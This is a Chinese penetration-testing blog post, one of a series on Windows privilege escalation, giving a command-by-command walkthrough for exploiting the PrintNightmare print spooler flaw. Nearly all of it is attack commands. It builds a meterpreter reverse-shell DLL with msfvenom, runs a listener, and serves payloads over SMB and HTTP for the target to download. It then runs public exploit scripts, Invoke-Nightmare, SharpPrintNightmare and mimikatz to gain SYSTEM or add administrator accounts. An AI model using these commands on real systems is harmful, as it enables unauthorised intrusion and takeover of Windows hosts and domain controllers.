WEB渗透Win提权篇-PrintNightmare

   提权工具合集包(免费分享): 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-优快云博客

WEB渗透Win提权篇-RDP&Firewall-优快云博客

WEB渗透Win提权篇-MSSQL-优快云博客

WEB渗透Win提权篇-MYSQL-udf-优快云博客

WEB渗透Win提权篇-AccountSpoofing-优快云博客

WEB渗透Win提权篇-弱权限提权-优快云博客

WEB渗透Win提权篇-PowerUp-优快云博客

WEB渗透Win提权篇-特权文件写入提权-优快云博客

WEB渗透Win提权篇-MSF提权-优快云博客

WEB渗透Win提权篇-CVE-2020-1472-优快云博客

WEB渗透Win提权篇-白名单提权-优快云博客

检查
Impacket - rpcdump
>python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
ItWasAllADream
>git clone https://github.com/byt3bl33d3r/ItWasAllADream
>cd ItWasAllADream && poetry install && poetry shell
>itwasalladream -u user -p Password123 -d domain 10.10.10.10/24
>docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10
执行
PrintNightmare-CVE-2021-34527
攻击机执行
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f dll -o evil.dll
检测是否存在领漏洞
>use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare
>set RHOSTS 192.168.1.190
>set SMBUser ignite
>set SMBPass 123
>set DLL_PATH /
>exploit
监听
>use multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>set LHOST 192.168.1.2
>set LPORT 4444
>exploit
https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
托管dll
>python3 /usr/share/doc/python3-impacket/examples/smbserver.py share /root
执行
./CVE-2021-34527.py ignite:123@192.168.1.190 '\\192.168.1.2\share\evil.dll'
即可获得system
或使用powershell
https://github.com/calebstewart/CVE-2021-1675.git
>python3 -m http.server 80
靶机执行>powershell wget http://192.168.1.2/CVE-2021-1675.ps1 -O \Users\Public\cve.ps1
>powershell -ep bypass
>Import-Module .\cve.ps1
>Invoke-Nightmare -NewUser "harsh" -NewPassword "123" -DriverName "PrintMe"
或使用mimikatz
MSF监听后
>python3 -m http.server 80
>powershell wget http://192.168.1.2/mimikatz.exe -O \users\Public\mimikatz.exe
>misc::printnightmare /library:\\192.168.1.2\share\evil.dll /authuser:ignite /authpassword:123 /try:50
SharpNightmare
https://github.com/cube0x0/CVE-2021-1675
>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
>python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
本地执行溢出
>SharpPrintNightmare.exe C:\addCube.dll
远程命令执行
>SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
>SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll'  'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
Invoke-Nightmare
本地执行溢出
https://github.com/calebstewart/CVE-2021-1675
>Import-Module .\cve-2021-1675.ps1
>Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
>Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" 
>Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Mimikatz v2.2.0-20210709+
本地执行溢出
>misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll
远程命令执行
>misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值